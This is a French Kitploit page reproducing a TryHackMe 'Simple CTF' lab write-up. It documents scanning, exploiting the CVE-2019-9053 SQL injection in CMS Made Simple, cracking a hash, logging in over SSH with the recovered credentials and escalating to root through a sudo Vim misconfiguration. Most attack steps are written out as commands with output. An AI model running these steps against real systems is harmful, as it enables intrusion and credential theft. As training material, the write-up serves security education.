Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Simple-CTF-Writeup — Procédure pas à pas professionnelle du CTF Simple de TryHackMe couvrant l'énumération, l'injection SQL dans CMS Made Simple (CVE-2019-9053), la récupération d'identifiants, l'accès SSH, l'escalade de privilèges via Vim, et la compromission du compte root. | Kitploit
Outils/GitHubGitHub/imperialx1104/simple-ctf-writeup
Cassage de Mots de PasseEscalade de PrivilègesReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHubimperialx1104/simple-ctf-writeup

Simple-CTF-Writeup

Procédure pas à pas professionnelle du CTF Simple de TryHackMe couvrant l'énumération, l'injection SQL dans CMS Made Simple (CVE-2019-9053), la récupération d'identifiants, l'accès SSH, l'escalade de privilèges via Vim, et la compromission du compte root.

Voir le dépôt
4il y a 3 moisPas encore vérifié

Simple-CTF-Writeup

Rapport de résolution professionnel du CTF Simple de TryHackMe couvrant l'énumération, l'injection SQL dans CMS Made Simple (CVE-2019-9053), la récupération d'identifiants, l'accès SSH, l'élévation de privilèges via Vim et la compromission root.

TryHackMe - Rapport de résolution Simple CTF

Un guide complet de la salle Simple CTF sur TryHackMe, couvrant la reconnaissance, l'énumération, l'exploitation, la récupération d'identifiants, l'élévation de privilèges et la capture des flags.


Informations sur la salle

ChampValeur
PlateformeTryHackMe
Nom de la salleSimple CTF
DifficultéFacile
CatégorieExploitation Web et Élévation de Privilèges Linux
AuteurSaahil Gupta (ImperialX1104)

Objectif

Le but de cette salle est de :

  • Énumérer la machine cible
  • Découvrir des services et applications cachés
  • Exploiter un CMS vulnérable
  • Récupérer des identifiants
  • Obtenir un accès SSH
  • Élever les privilèges jusqu'à root
  • Capturer les deux flags

Aperçu de l'attaque

root@kitploit:~
Host Discovery
      │
      ▼
Port Enumeration
      │
      ▼
Directory Enumeration
      │
      ▼
CMS Discovery
      │
      ▼
Version Identification
      │
      ▼
SQL Injection (CVE-2019-9053)
      │
      ▼
Credential Extraction
      │
      ▼
Password Cracking
      │
      ▼
SSH Access
      │
      ▼
User Flag
      │
      ▼
Privilege Escalation
      │
      ▼
Root Flag

Reconnaissance

Découverte de l'hôte

La première étape consistait à vérifier la connectivité avec la machine cible.

Commande

root@kitploit:~
ping 10.49.175.174

Résultat

L'hôte a répondu avec succès, confirmant qu'il était joignable.

Capture d'écran

Ping Scan


Énumération des ports

Un scan Nmap complet a été effectué pour identifier les services exposés.

Commande

root@kitploit:~
nmap -A -v 10.49.175.174

Résultats

PortServiceVersion
21FTPvsftpd 3.0.3
80HTTPApache 2.4.18
2222SSHOpenSSH 7.2p2

Résultats notables

  • Connexion FTP anonyme activée
  • Serveur web Apache en fonctionnement
  • SSH exposé sur le port 2222
  • Fichier robots.txt découvert

Capture d'écran

Nmap Enumeration


Énumération Web

La navigation vers le serveur web cible affichait la page d'accueil Apache par défaut.

URL

root@kitploit:~
http://10.49.175.174

Capture d'écran

Apache Default Page

À ce stade, aucune surface d'attaque évidente n'était visible.


Énumération des répertoires

Pour identifier les ressources cachées, un brute-force de répertoires a été effectué avec FFUF.

Commande

root@kitploit:~
ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200

Résultats

root@kitploit:~
simple [Status: 301]

Capture d'écran

FFUF Enumeration

Un répertoire nommé /simple a été découvert.


Découverte du CMS

La navigation vers le répertoire découvert a révélé une installation de CMS.

URL

root@kitploit:~
http://10.49.175.174/simple

Capture d'écran

CMS Made Simple

CMS identifié

root@kitploit:~
CMS Made Simple 2.2.8

Le numéro de version se révélera plus tard crucial.


Recherche de vulnérabilités

La version du CMS a été recherchée via SearchSploit.

Commande

root@kitploit:~
searchsploit "CMS Made Simple"

Résultat

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection

Capture d'écran

SearchSploit Results

Une vulnérabilité connue d'injection SQL a été identifiée.


Acquisition de l'exploit

L'exploit a été copié localement pour analyse et exécution.

Commande

root@kitploit:~
searchsploit -m 46635

Sortie

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

Capture d'écran

Exploit Download


Exploitation

L'exploit accessible publiquement a été exécuté contre l'instance cible du CMS.

Commande

root@kitploit:~
python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt

Extraction des identifiants

L'exploit a extrait avec succès des informations de la base de données back-end.

Sortie

root@kitploit:~
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

Capture d'écran

Credential Extraction

Informations récupérées

ÉlémentValeur
Nom d'utilisateurmitch
Email[email protected]
Sel1dac0d92e9fa6bb2

Cassage du mot de passe

Le hash extrait a été craqué avec Hashcat.

Commande

root@kitploit:~
hashcat -m 20 hash.txt --show

Sortie

root@kitploit:~
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

Identifiants récupérés

ChampValeur
Nom d'utilisateurmitch
Mot de passesecret

Capture d'écran

Hashcat Password Recovery


Accès initial

Les identifiants récupérés ont été testés contre le service SSH.

Commande

root@kitploit:~
ssh [email protected] -p 2222

Mot de passe

root@kitploit:~
secret

Résultat

root@kitploit:~
Welcome to Ubuntu 16.04.6 LTS

Capture d'écran

SSH Access

L'authentification réussie a fourni un accès shell en tant qu'utilisateur mitch.


Flag utilisateur

Après avoir obtenu l'accès, le flag utilisateur se trouvait dans le répertoire personnel de Mitch.

Commandes

root@kitploit:~
whoami
cd ~
cat user.txt

Sortie

root@kitploit:~
G00d j0b, keep up!

Capture d'écran

User Flag


Élévation de privilèges

Énumération sudo

La vérification des permissions sudo a révélé une configuration intéressante.

Commande

root@kitploit:~
sudo -l

Sortie

root@kitploit:~
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Capture d'écran

sudo -l Output

Cette configuration permet à l'utilisateur d'exécuter Vim avec les privilèges root sans fournir de mot de passe.


Accès root

Lancement de Vim en tant que root :

root@kitploit:~
sudo vim

Étant donné que Vim s'exécutait avec des privilèges élevés, il pouvait être utilisé pour accéder à des fichiers appartenant à root.

Capture d'écran

Root Access via Vim


Flag root

Le flag root se trouvait dans le répertoire de l'utilisateur root.

Commande

root@kitploit:~
:! cat /root/root.txt

Sortie

root@kitploit:~
W3ll d0n3. You made it!

Capture d'écran

Root Flag


Flags capturés

Flag utilisateur

root@kitploit:~
G00d j0b, keep up!

Flag root

root@kitploit:~
W3ll d0n3. You made it!

Résumé de la chaîne d'attaque

root@kitploit:~
Nmap Scan
    ↓
Web Enumeration
    ↓
Directory Discovery (/simple)
    ↓
CMS Made Simple 2.2.8
    ↓
SearchSploit Research
    ↓
CVE-2019-9053 SQL Injection
    ↓
Credential Extraction
    ↓
Hash Cracking
    ↓
SSH Login (mitch:secret)
    ↓
User Flag
    ↓
sudo -l
    ↓
Vim Privilege Escalation
    ↓
Root Flag

Leçons apprises

L'énumération compte

Le CMS vulnérable n'était pas visible sur la page d'accueil et a nécessité une énumération des répertoires pour être découvert.

L'identification de version est cruciale

Connaître la version exacte du CMS a conduit directement à une vulnérabilité connue.

Réutilisation des identifiants

Les identifiants récupérés doivent toujours être testés sur tous les services disponibles.

Les mauvaises configurations sudo sont dangereuses

Autoriser l'exécution privilégiée d'éditeurs comme Vim peut conduire à une compromission totale du système.


Outils utilisés

  • Nmap
  • FFUF
  • SearchSploit
  • Python
  • Hashcat
  • SSH
  • Vim

Conclusion

Cette salle a démontré une chaîne d'attaque complète, de l'énumération initiale à la compromission totale en root. En combinant l'énumération d'applications web, l'exploitation par injection SQL, le cassage de mots de passe et les techniques d'élévation de privilèges Linux, le contrôle total du système cible a été obtenu.

La salle constitue une excellente introduction à la méthodologie de test d'intrusion réelle et souligne l'importance d'une gestion correcte des correctifs logiciels, de la sécurité des identifiants et des contrôles d'accès basés sur le moindre privilège.


Auteur

Saahil Gupta (ImperialX1104)

  • GitHub: https://github.com/ImperialX1104
  • TryHackMe: ImperialX

⭐ Si vous avez trouvé ce rapport utile, pensez à mettre une étoile sur le dépôt et à me contacter sur GitHub.

Télécharger l’outil